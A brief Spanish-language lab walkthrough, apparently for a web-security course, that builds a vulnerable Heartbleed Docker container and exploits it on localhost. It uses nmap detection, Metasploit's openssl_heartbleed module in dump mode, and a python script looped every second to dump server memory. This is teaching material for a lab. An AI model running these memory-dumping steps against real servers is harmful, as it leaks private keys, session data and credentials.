Construir la imagen en Docker:
docker build -t heartbleed-image-websegapp .
Crear un contenedor en base a la imagen abriendo los puertos y exponiendo los volumenes internos:
docker run -p 443:443 --name heartbleed-server -d -it heartbleed-image-websegapp
Con NMAP:
nmap -sV -p 443 --script ssl-heartbleed localhost
Con MSF:
msfconsole
Usamos el plugin para explotar la vulnerabilidad:
use auxiliary/scanner/ssl/openssl_heartbleed
Establecer el servidor victima y ponemos en modo dump el plugin:
set RHOSTS localhost
set verbose true
Explotamos la vulnerabilidad:
exploit
Requisito: tener instalado python 2.7
Creamos el archivo donde vamos a hacer dump del servidor y vemos que va pasando en vivo:
truncate -s0 /tmp/heartbleed.out && tail -f /tmp/heartbleed.out
Ejecutamos el exploit cada un segundo y volcamos el contenido:
while true; do python heartbleed.py localhost >> /tmp/heartbleed.out; sleep 1; done